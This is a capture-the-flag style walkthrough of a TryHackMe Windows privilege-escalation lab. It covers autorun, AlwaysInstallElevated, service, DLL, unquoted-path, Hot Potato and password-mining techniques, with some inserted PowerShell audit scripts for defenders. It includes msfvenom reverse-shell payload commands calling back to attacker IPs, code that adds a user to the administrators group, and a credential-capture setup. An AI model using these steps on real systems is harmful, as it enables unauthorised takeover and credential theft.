
Windows PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321

THM Room https://tryhackme.com/room/windowsprivescarena

TASK 1 : Connecting to TryHackMe network

I’ve read the intro and deployed the attached virtual machine.

No Answer

TASK 2 : Deploy the vulnerable machine

Deploy the machine and log into the user account via RDP

No Answer

Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?

[Screenshot: User]

Answer : TCM

TASK 3 : Registry Escalation - Autorun

Click ‘Completed’ once you have successfully elevated the machine

First, I looked at autoruns64.exe for “program.exe”, then I checked with accesschk that the group “Everyone” has the “FILE_ALL_ACCESS” permission:

[Screenshot: Permission]

After building a program.exe reverse shell with msfvenom on the attacker machine:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.135.148 -f exe -o program.exe

I uploaded it to the “C:\Program Files\Autorun Program” directory (via a python3 HTTP server on the attacker machine).

Then I launched a handler in Metasploit and logged in again as an admin to simulate an administrator connection:

[Screenshot: Meterpreter]

I got an active Meterpreter session. Let’s check the user groups:

[Screenshot: Groups]

No Answer.

TASK 4 : Registry Escalation - AlwaysInstallElevated

Click ‘Completed’ once you have successfully elevated the machine

First, checking that the registry key is set to 1:

[Screenshot: AlwaysInstallElevated Registry Key]
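The check the screenshot shows by hand, written as a read-only PowerShell audit. This is an added example, not code from the original post or from the room. It assumes the two documented policy locations under HKLM and HKCU, and the function and variable names are mine. The point worth remembering as a defender: Windows Installer only honours the policy when both values are 1, so the audit reports the combination, not either value alone.

```powershell
# Added example, not code from the original post: read-only audit of the
# AlwaysInstallElevated policy. Windows Installer only honours it when BOTH the
# machine-wide (HKLM) and the per-user (HKCU) value are 1. Requires PowerShell 3.0+.
function Get-AlwaysInstallElevatedValue([string]$Hive) {
    $key = "$($Hive):\SOFTWARE\Policies\Microsoft\Windows\Installer"
    if (-not (Test-Path $key)) { return 0 }   # key absent: policy not configured
    $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }          # value absent: policy not configured
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $machine = Get-AlwaysInstallElevatedValue 'HKLM'
    $user    = Get-AlwaysInstallElevatedValue 'HKCU'
    [pscustomobject]@{
        MachineValue = $machine
        UserValue    = $user
        # Only the combination is exploitable: a standard user's MSI then runs as SYSTEM.
        Vulnerable   = ($machine -eq 1 -and $user -eq 1)
    }
}

$state = Test-AlwaysInstallElevated
$state | Format-List

if ($state.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in HKLM and HKCU: any MSI a standard user installs runs as SYSTEM.'
    # Remediation (needs an elevated prompt, so left commented out in an audit script):
    # Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -Value 0
    # Set-ItemProperty -Path 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -Value 0
}
```

Run it as the user whose HKCU hive you want to assess; the HKLM value is the same for everyone on the host, so a result of MachineValue 1 / UserValue 0 still deserves a ticket, since any user who can write their own HKCU policy key completes the pair.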

Then creating an MSI reverse shell installer with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.199.49 lport=4545 -f msi -o setup.msi

With a simple Python HTTP server, I downloaded the file onto the target, then ran the command:

[Screenshot: Download Malicious File]

In the Metasploit listener launched previously, I received a shell with SYSTEM rights:

[Screenshot: Reverse shell]

No Answer.

TASK 5 : Service Escalation - Registry

Click ‘Completed’ once you have successfully elevated the machine

[Screenshot: Permissions]

Compiled the C code, with the changes to the system() call, into x.exe:

[...]
//add the payload here
int Run() 
{ 
    //system("whoami > c:\\windows\\temp\\service.txt");
    system("cmd.exe /k net localgroup administrators user /add");
    return 0; 
} 
[...]

[Screenshot: x.exe]

Then adding x.exe to the target and launching the service:

[Screenshot: Whoami]

We can see that our local user has been added to the local administrators group.

No Answer.

TASK 6 : Service Escalation - Executable Files

Click ‘Completed’ once you have successfully elevated the machine

Detection of the vulnerability:

[Screenshot: Detection]

The filepermservice.exe file has the “FILE_ALL_ACCESS” permission set for Everyone.

Exploitation: using the x.exe file from before, I copied it over filepermservice.exe to replace it.

copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

Then starting the service:

sc start filepermsvc

We now have the user added to the local administrators group:

[Screenshot: Verification]

No Answer

TASK 7 : Privilege Escalation - Startup Applications

Click ‘Completed’ once you have successfully elevated the machine

New payload generated:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.199.49 LPORT=53 -f exe -o x.exe

Detection:

[Screenshot: Verification]

Users have F (full access) permission on the Startup folder, as intended.
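Tasks 3, 6 and 7 are the same weakness in three places: a path that an administrator or a service account will execute, but that a low-privileged principal can write to. The accesschk and icacls checks in those tasks are done one path at a time; the PowerShell below is an added example (not code from the original post or the room) that walks all three locations and reports only the writable ones. The principal list, the write mask and the function names are my own choices; Get-WmiObject is used because it exists on the Windows 7 PowerShell versions.

```powershell
# Added example, not code from the original post: audit the autostart locations
# the post abuses. Write access for a low-privileged principal on any of them lets
# a standard user stage a binary that an admin (Run key, Startup folder) or the
# service account (service binary) executes later. Requires PowerShell 3.0+.

# Principals that must never hold write or modify rights on these paths.
$LowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow replacing the file: Write, Modify, FullControl, plus the
# GENERIC_WRITE / GENERIC_ALL bits that some ACEs carry unresolved.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::Modify -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl) -bor 0x40000000 -bor 0x10000000

# Extract the executable from a command line, quoted or not:
#   "C:\Program Files\Autorun Program\program.exe" /silent -> C:\Program Files\Autorun Program\program.exe
#   C:\Windows\system32\svchost.exe -k netsvcs              -> C:\Windows\system32\svchost.exe
function Get-ExecutablePath([string]$CommandLine) {
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = $CommandLine.Trim()
    if ($cmd.StartsWith('"')) {
        $close = $cmd.IndexOf('"', 1)
        if ($close -gt 1) { return $cmd.Substring(1, $close - 1) }
        return $cmd.Trim('"')
    }
    $end = $cmd.ToLower().IndexOf('.exe')
    if ($end -ge 0) { return $cmd.Substring(0, $end + 4) }
    return ($cmd -split ' ')[0]
}

# Low-privileged principals allowed to write to $Path (nothing if none or path missing).
function Get-LowPrivWriters([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { $ace.IdentityReference.Value }
    }
}

$targets = @()

# Task 3: programs started from the machine-wide Run keys.
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
$psProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty $key).PSObject.Properties) {
        if ($psProps -contains $p.Name) { continue }
        $targets += [pscustomobject]@{ Source = "Run\$($p.Name)"; Path = Get-ExecutablePath $p.Value }
    }
}

# Task 6: service binaries (Get-WmiObject is available on PowerShell 2.0-5.1).
foreach ($svc in Get-WmiObject -Class Win32_Service) {
    $targets += [pscustomobject]@{ Source = "Service\$($svc.Name)"; Path = Get-ExecutablePath $svc.PathName }
}

# Task 7: the all-users Startup folder itself (anything dropped there runs at every logon).
$targets += [pscustomobject]@{ Source = 'StartupFolder'; Path = [Environment]::GetFolderPath('CommonStartup') }

# Report only the entries a low-privileged principal could replace or populate.
foreach ($t in $targets) {
    if (-not $t.Path) { continue }
    $writers = @(Get-LowPrivWriters $t.Path)
    if ($writers.Count -gt 0) {
        [pscustomobject]@{ Source = $t.Source; Path = $t.Path; WritableBy = ($writers -join ', ') }
    }
}
```

Run it elevated so every service is enumerated. On the room's VM it should list the Autorun Program entry, filepermservice.exe and the Startup folder with Everyone or BUILTIN\Users as the writer, matching the accesschk output in the screenshots; on a production host the fix is to remove the write ACE for those principals, or to move the binary under a directory that only administrators can modify.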

Exploitation:

Let’s download our new exe file to this folder.

[Screenshot: y.exe]

Then, when logged in as an admin user, I received a privileged shell:

[Screenshot: Verification]

No Answer

TASK 8 : Service Escalation - DLL Hijacking

Click ‘Completed’ once you have successfully elevated the machine

First, I created the modified DLL from the given file:

[Screenshot: windows_dll.c]

Then restarted the dllsvc service:

[Screenshot: Service Restart]

No Answer.

TASK 9 : Service Escalation - binPath

Click ‘Completed’ once you have successfully elevated the machine

First, I checked that the user has the “SERVICE_CHANGE_CONFIG” permission set:

[Screenshot: Permissions]

Then adding our user to the local admin group:

[Screenshot: Local admin group]

No Answer

TASK 10 : Service Escalation - Unquoted Service Paths

Click ‘Completed’ once you have successfully elevated the machine

Checking that I can exploit an unquoted path:

[Screenshot: unquoted path]
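The screenshot shows one unquoted path found by hand. As an added example (not code from the original post or the room), the PowerShell below enumerates every service whose ImagePath is unquoted and contains a space, lists the intermediate executables Windows would try before the real one, and builds the quoted value that fixes it. Function names are mine; the registry location it repairs is the standard ImagePath value under the service's key.

```powershell
# Added example, not code from the original post: detect and repair unquoted
# service paths. Requires PowerShell 3.0+; run elevated to see every service.
function Get-UnquotedServicePath {
    # Get-WmiObject is available on PowerShell 2.0-5.1 (Get-CimInstance on PowerShell 7).
    foreach ($svc in Get-WmiObject -Class Win32_Service) {
        $cmd = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($cmd) -or $cmd.StartsWith('"')) { continue }
        $end = $cmd.ToLower().IndexOf('.exe')
        if ($end -lt 0) { continue }
        $exe  = $cmd.Substring(0, $end + 4)     # executable part of the command line
        $rest = $cmd.Substring($end + 4)        # arguments, kept verbatim for the fix
        if ($exe -notmatch ' ') { continue }    # no space: the path is not ambiguous
        # Each space in the unquoted path yields one path CreateProcess tries first:
        #   C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        #   -> C:\Program.exe, C:\Program Files\Unquoted.exe, C:\Program Files\Unquoted Path.exe, ...
        $parts = $exe -split ' '
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
        [pscustomobject]@{
            Service    = $svc.Name
            StartName  = $svc.StartName         # account the service runs as (LocalSystem = full impact)
            ImagePath  = $cmd
            Candidates = $candidates
            FixedPath  = '"' + $exe + '"' + $rest
        }
    }
}

# Remediation: quote the ImagePath value the Service Control Manager reads at start.
function Repair-UnquotedServicePath([string]$Service, [string]$FixedPath) {
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Service" -Name ImagePath -Value $FixedPath
}

Get-UnquotedServicePath | Format-List
# Apply the fix to every finding (elevated prompt required):
# Get-UnquotedServicePath | ForEach-Object { Repair-UnquotedServicePath $_.Service $_.FixedPath }
```

A finding is only exploitable when a low-privileged user can create a file at one of the Candidates paths, which is what the accesschk check in the screenshot establishes; run icacls on each candidate's parent directory to confirm before prioritising, but quote the path regardless, since directory permissions change and quoting costs nothing.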

Built an exe file that adds the user to the local admin group:

[Screenshot: common.exe]

Launching the exploit:

[Screenshot: Exploit]

No Answer

TASK 11 : Potato Escalation - Hot Potato

Click ‘Completed’ once you have successfully elevated the machine

“Hot potato is the code name of a Windows privilege escalation technique that was discovered by Stephen Breen. This technique is actually a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.” (pentestlab.blog, https://pentestlab.blog/2017/04/13/hot-potato/)

Executing the provided script for the Hot Potato exploit:

[Screenshot: Exploit]

It added our user to the local administrators group.

No Answer.

TASK 12 : Password Mining Escalation - Configuration Files

What is the cleartext password found in Unattend.xml?

Unexpected password found in the XML configuration file:

[Screenshot: Configuration File]

It’s base64 encoded, so I need to decode it:

[Screenshot: Decoded Password]

Answer : password123

TASK 13 : Password Mining Escalation - Memory

Click ‘Completed’ once you have successfully found all the passwords

Started msfconsole and used the following commands:

use auxiliary/server/capture/http_basic
set uripath x
set SRVPORT 8888
run

Then I browsed to http://10.10.199.49:8888/x on the Windows target and got an error while connecting. So, I created a dump file of the Internet Explorer process via the Task Manager:

[Screenshot: Dump]

[Screenshot: Dumping process]

[Screenshot: Dumping process 2]

Next I ran an SMB server on Kali:

sudo python3 /opt/impackets/examples/smbserver.py kali .

so I could transfer the dump files from Windows to the Kali machine:

[Screenshot: Transfer dump]

The strings command didn’t return anything:

strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

But in the Metasploit capture, I got the password:

[Screenshot: Exploit]

No Answer

TASK 14 : Privilege Escalation - Kernel Exploits

Click ‘Completed’ once you have successfully elevated the machine

The msfvenom payload kept crashing for me, even when changing settings like the encoder or architecture.

When the reverse shell was established, it instantly died.

No Answer

This post is licensed under CC BY 4.0 by the author.